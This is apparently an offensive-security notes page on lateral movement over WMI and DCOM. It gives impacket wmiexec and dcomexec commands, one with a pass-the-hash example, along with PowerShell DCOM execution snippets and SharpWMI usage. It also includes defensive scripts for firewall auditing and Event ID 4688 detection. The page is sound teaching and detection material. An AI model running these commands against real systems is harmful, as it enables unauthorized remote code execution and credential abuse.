# WMI and DCOM

## Overview

Windows Management Instrumentation (WMI) and Distributed Component Object Model (DCOM) provide alternative remote execution methods when SMB or WinRM is blocked. WMIExec uses WMI to spawn processes, leaving fewer artifacts than PsExec (no service is created). DCOM objects (MMC20, ShellWindows, ShellBrowserWindow) enable lateral movement by instantiating COM objects on remote systems. Both methods run over RPC: TCP/135 (the endpoint mapper) plus a dynamic high port on which the WMI or DCOM server listens.
## Prerequisites

- Valid credentials or NTLM hash with administrative privileges on the target
- RPC ports (135 + dynamic range) accessible (may require firewall exceptions)
- impacket suite (wmiexec.py, dcomexec.py) or PowerShell
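The RPC prerequisite above is the one most often half-met: a firewall exception for TCP/135 alone lets the endpoint mapper answer but not the dynamic high port the WMI or DCOM server is actually bound to, so the connection stalls after the first RPC call. The script below is an added example (not from this page or from impacket) that audits a segmentation policy for exactly that gap. The ruleset, hosts and subnets are constructed; rules are modelled as an ordered list evaluated first-match-wins with an implicit default deny, and 49152-65535 is the Windows default dynamic RPC range (pass the pinned range instead where RPC ports have been restricted on the targets).

```python
"""Check whether a firewall policy permits the WMI/DCOM transport:
TCP/135 (RPC endpoint mapper) and then a dynamic RPC port on the target.

Added example, not part of the original page. Ruleset and addresses are
constructed; evaluation is first-match-wins with implicit default deny.
"""
from dataclasses import dataclass
from functools import lru_cache
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class Rule:
    src: str      # source CIDR
    dst: str      # destination CIDR
    port_lo: int  # inclusive TCP port range
    port_hi: int
    action: str   # "allow" or "deny"


_net = lru_cache(maxsize=None)(ip_network)   # parse each CIDR once


def _decide(rules, src_ip, dst_ip, port):
    for r in rules:
        if (src_ip in _net(r.src) and dst_ip in _net(r.dst)
                and r.port_lo <= port <= r.port_hi):
            return r.action
    return "deny"  # nothing matched: implicit default deny


def decision(rules, src, dst, port):
    """Policy verdict for one TCP flow, given source/destination as strings."""
    return _decide(rules, ip_address(src), ip_address(dst), port)


def allowed_runs(rules, src, dst, lo, hi):
    """Collapse per-port verdicts over [lo, hi] into allowed (start, end) runs."""
    src_ip, dst_ip = ip_address(src), ip_address(dst)
    runs, start = [], None
    for port in range(lo, hi + 1):
        if _decide(rules, src_ip, dst_ip, port) == "allow":
            start = port if start is None else start
        elif start is not None:
            runs.append((start, port - 1))
            start = None
    if start is not None:
        runs.append((start, hi))
    return runs


def rpc_path_status(rules, src, dst, dynamic=(49152, 65535)):
    """Summarise whether WMI/DCOM from src can reach dst through this policy."""
    epm_open = decision(rules, src, dst, 135) == "allow"
    runs = allowed_runs(rules, src, dst, *dynamic)
    return {
        "endpoint_mapper": epm_open,
        "dynamic_allowed": runs,
        # 135 alone is not enough: the real call goes to the high port the server chose
        "wmi_dcom_reachable": epm_open and bool(runs),
        # partial coverage means the connection fails whenever the server binds a denied port
        "fully_open": epm_open and runs == [tuple(dynamic)],
    }


# Constructed policy: a jump host is meant to manage the server VLAN, workstations
# were only ever given 135, and an old carve-out denies part of the dynamic range.
SAMPLE_RULES = [
    Rule("10.1.0.0/24", "10.2.0.0/24", 50000, 50099, "deny"),
    Rule("10.1.0.10/32", "10.2.0.0/24", 135, 135, "allow"),
    Rule("10.1.0.10/32", "10.2.0.0/24", 49152, 65535, "allow"),
    Rule("10.1.0.0/24", "10.2.0.0/24", 135, 135, "allow"),
]

if __name__ == "__main__":
    for src in ("10.1.0.10", "10.1.0.50"):
        print(src, "->", "10.2.0.5", rpc_path_status(SAMPLE_RULES, src, "10.2.0.5"))
```

For the constructed policy the jump host reaches the server VLAN but only partially (the carve-out splits the dynamic range in two), while a workstation gets an answer from the endpoint mapper and nothing else, which is the "works in one test, hangs in the next" symptom the pitfalls section describes.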
## Exploitation / Execution

### 1. impacket-wmiexec

Creates a semi-interactive shell via WMI process creation. No service creation, fewer artifacts than PsExec:

```bash
# With password (Kali packages the script as impacket-wmiexec; a pip install provides wmiexec.py)
impacket-wmiexec <domain>/<user>:'<password>'@<IP>
# With NTLM hash (PTH)
impacket-wmiexec <domain>/<user>@<IP> -hashes :<NTLM_hash>
impacket-wmiexec -hashes :184fb5e5178480be64824d4cd53b99ee administrator@10.10.10.192
```

```bash
# impacket-wmiexec shell type and codec flags
impacket-wmiexec 'domain.local/user:pass@target' -shell-type powershell
# -shell-type: cmd (default) | powershell (for cmd.exe restricted environments)
# -codec: Character encoding for international Windows (e.g., -codec utf-8)
```
### 2. impacket-dcomexec

Uses DCOM objects for remote execution. Multiple DCOM object options provide flexibility when specific objects are blocked:

```bash
# Default (MMC20 Application)
impacket-dcomexec <domain>/<user>:'<password>'@<IP>
# With hash
impacket-dcomexec <domain>/<user>@<IP> -hashes :<NTLM_hash>
# Specify DCOM object (-object accepts MMC20, ShellWindows or ShellBrowserWindow)
impacket-dcomexec <domain>/<user>@<IP> -object MMC20
impacket-dcomexec <domain>/<user>@<IP> -object ShellWindows
impacket-dcomexec <domain>/<user>@<IP> -object ShellBrowserWindow
```
### 3. PowerShell WMI (Native, from Windows host)

```powershell
# Create a remote process via WMI
$cred = Get-Credential
$target = "<IP>"
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\temp\out.txt" -ComputerName $target -Credential $cred

# Execute with alternate credentials. -List returns the Win32_Process class object,
# which exposes Create(); without -List, Get-WmiObject returns the existing process
# instances, and those have no Create() method.
$wmiClass = Get-WmiObject -Class Win32_Process -List -ComputerName $target -Credential $cred
$wmiClass.Create("powershell.exe -c '...'")

# Using Invoke-CimMethod (newer). Note: -ComputerName on the CIM cmdlets connects over
# WS-Man (WinRM) by default; to use DCOM/RPC instead, create a CIM session with
# New-CimSessionOption -Protocol Dcom and pass it via -CimSession.
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine="cmd.exe /c whoami"} -ComputerName $target
```
### 4. WMI for Command Output Retrieval

WMI does not return command output: the Win32_Process Create method returns only a return code and the new process ID. Use file output and read-back:

```powershell
# Step 1: Write output to file
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\Windows\Temp\out.txt" -ComputerName <target> -Credential $cred
# Step 2: Read file
Get-Content \\<target>\C$\Windows\Temp\out.txt # Via SMB
```
### 5. DCOM Lateral Movement with PowerShell

```powershell
# MMC20.Application DCOM object
$mmc = [Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "<target>"))
$mmc.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c whoami > C:\temp\out.txt", "7")

# ShellWindows DCOM object
$shell = [Activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39", "<target>"))
# Navigate to a Windows Explorer window and execute command

# ShellBrowserWindow
$shell = [Activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880", "<target>"))
# Last argument is the window style (0 = hidden)
$shell.Document.Application.ShellExecute("cmd.exe", "/c whoami", "C:\Windows\System32", $null, 0)
```
### 6. SharpWMI (C# Tool)

```powershell
# SharpWMI takes key=value arguments (see the README linked under Tool References)
.\SharpWMI.exe action=exec computername=<target> command="cmd.exe /c whoami"
# With explicit credentials
.\SharpWMI.exe action=exec computername=<target> username=<domain>\<user> password=<password> command="cmd.exe /c whoami"
```

### 7. Advanced DCOM Lateral Movement

```text
# MoveLaterally / SharpMove for advanced DCOM exploitation
# DCOM methods: ShellWindows, ShellBrowserWindow, ExcelDDE, MMC20.Application
```
## When to Use Each Method

| Method | Best For | Artifacts |
|---|---|---|
| WMIExec | General lateral movement | Process: wmiprvse.exe, Event ID 4688 |
| DCOM (MMC20) | When WMI is restricted | Process: mmc.exe spawning child |
| DCOM (ShellWindows) | When MMC20 is blocked | Process: explorer.exe spawning child |
| DCOM (ShellBrowserWindow) | Stealthier alternative | Process: explorer.exe spawning child |
| WinRM/PSSession | Interactive shell preferred | Process: wsmprovhost.exe |
## Common Pitfalls

- ⚠️ WMI does not return command output directly -> redirect to file and read via SMB
- ⚠️ DCOM requires high-port RPC access -> firewalls between network segments may block dynamic ports
- ⚠️ DCOM objects require specific Windows features enabled -> ShellBrowserWindow requires Explorer running
- ⚠️ WMI process creation leaves wmiprvse.exe processes that may be monitored
## OPSEC Considerations

- 🛡️ WMI process creation generates Event ID 4688 with parent process wmiprvse.exe
- 🛡️ DCOM execution generates Event ID 4688 with parent process svchost.exe (DcomLaunch)
- 🛡️ WMI activity is logged in Microsoft-Windows-WMI-Activity/Operational log
- 🛡️ Multiple failed DCOM attempts may trigger COM object access failure logs
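The artifact column of the method table and the Event ID 4688 notes above describe what a defender can key on. The script below is an added example (not from this page, impacket or any tool it references) that runs those parent/child and command-line heuristics over constructed 4688 records. The wmiexec.py output wrapper it matches (`cmd.exe /Q /c <cmd> 1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1`) is the tool's documented behaviour; the event dicts, host names and the low/medium/high confidence levels are constructed for the example.

```python
"""Heuristics for the process-creation artifacts listed on this page (method
table and OPSEC notes), run over Security log 4688 records.

Added example, not part of the original page or any tool it references.
The events are constructed dicts carrying the 4688 fields that matter; real
records come from Get-WinEvent or a SIEM and need command-line auditing
enabled for CommandLine to be populated.
"""
import re
from dataclasses import dataclass

# Parent process -> (technique, base confidence). Base confidence reflects how
# often the same chain occurs benignly: explorer.exe spawning cmd.exe is normal
# user behaviour, WmiPrvSE.exe spawning it is not.
PARENT_TECHNIQUES = {
    "wmiprvse.exe": ("WMI Win32_Process.Create (wmiexec / Invoke-WmiMethod)", "medium"),
    "mmc.exe": ("DCOM MMC20.Application ExecuteShellCommand", "medium"),
    "explorer.exe": ("DCOM ShellWindows / ShellBrowserWindow ShellExecute", "low"),
}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                  "cscript.exe", "mshta.exe", "rundll32.exe"}
LEVELS = ["low", "medium", "high"]

# impacket's wmiexec.py wraps every command as
#   cmd.exe /Q /c <cmd> 1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1
# so it can read the output back over SMB; that wrapper is a strong signature.
WMIEXEC_WRAPPER = re.compile(
    r"cmd\.exe\s+/Q\s+/c\s+.+?1>\s*\\\\\S+\\ADMIN\$\\__\d+(?:\.\d+)?\s+2>&1",
    re.IGNORECASE)
# The manual variants on this page redirect output to a file and fetch it via C$.
FILE_REDIRECT = re.compile(r"\s1?>>?\s*[A-Za-z]:\\")


@dataclass
class Finding:
    computer: str
    new_process_id: int
    technique: str
    confidence: str
    command_line: str


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _escalate(level, steps=1):
    return LEVELS[min(LEVELS.index(level) + steps, len(LEVELS) - 1)]


def analyze_4688(events):
    """Return one Finding per 4688 record whose parent/child chain matches a WMI/DCOM technique."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4688:
            continue
        parent = _basename(ev.get("ParentProcessName", ""))
        child = _basename(ev.get("NewProcessName", ""))
        if parent not in PARENT_TECHNIQUES or child not in SHELL_CHILDREN:
            continue
        technique, confidence = PARENT_TECHNIQUES[parent]
        cmdline = ev.get("CommandLine", "")
        if WMIEXEC_WRAPPER.search(cmdline):
            technique = "impacket wmiexec (ADMIN$ output-redirection wrapper)"
            confidence = "high"
        elif FILE_REDIRECT.search(cmdline):
            # Output written to disk for out-of-band read-back: typical of remote
            # execution with no return channel, rare for a user at the console.
            confidence = _escalate(confidence)
        # 4688 reports process IDs as hex strings ("0x1a4"); int(..., 0) accepts both forms
        findings.append(Finding(ev["Computer"], int(str(ev["NewProcessId"]), 0),
                                technique, confidence, cmdline))
    return findings


# Constructed sample records (not real log data).
SAMPLE_EVENTS = [
    # wmiexec semi-interactive shell: WmiPrvSE spawns cmd with the ADMIN$ wrapper
    {"EventID": 4688, "Computer": "WS01.corp.local",
     "NewProcessName": r"C:\Windows\System32\cmd.exe", "NewProcessId": "0x1a4",
     "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.123 2>&1"},
    # MMC20.Application: mmc.exe spawns cmd, output to a file for later read-back
    {"EventID": 4688, "Computer": "WS02.corp.local",
     "NewProcessName": r"C:\Windows\System32\cmd.exe", "NewProcessId": "0x2b0",
     "ParentProcessName": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r"cmd.exe /c whoami > C:\temp\out.txt"},
    # Likely benign: a user opening a command prompt from Explorer, no redirection
    {"EventID": 4688, "Computer": "WS03.corp.local",
     "NewProcessName": r"C:\Windows\System32\cmd.exe", "NewProcessId": "0x3c8",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" '},
    # Unrelated: svchost spawning the task scheduler engine
    {"EventID": 4688, "Computer": "WS03.corp.local",
     "NewProcessName": r"C:\Windows\System32\taskeng.exe", "NewProcessId": "0x410",
     "ParentProcessName": r"C:\Windows\System32\svchost.exe", "CommandLine": "taskeng.exe"},
]

if __name__ == "__main__":
    for f in analyze_4688(SAMPLE_EVENTS):
        print(f"{f.computer} pid={f.new_process_id} [{f.confidence}] {f.technique}: {f.command_line}")
```

The explorer.exe chain is deliberately scored low on its own, since it is how every user opens a shell; it is the combination with a redirect to a file (or a network logon on the same host, which the 4688 record alone does not carry) that makes it worth a look for the ShellWindows/ShellBrowserWindow case.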
## Post-Exploitation Value

- Remote code execution when SMB/WinRM are filtered
- Multiple DCOM object fallbacks when one object is unavailable
- WMI querying can enumerate system state without interactive shell
- DCOM can be used for persistence via WMI event subscriptions
## Cross-References

### Tool References

| Tool | Link |
|---|---|
| impacket (wmiexec, dcomexec) | https://github.com/fortra/impacket |
| SharpWMI | https://github.com/GhostPack/SharpWMI |
### Source Machines

- Blackfield (Hard, AD) - WMIExec as alternative to PsExec
## Additional Notes

- WmiPrvSE.exe is the WMI Provider Host process that executes on behalf of WMI clients
- DCOM authentication levels can be configured per-application and may block certain methods
- Some DCOM objects require an interactive window station (session 0 or user sessions)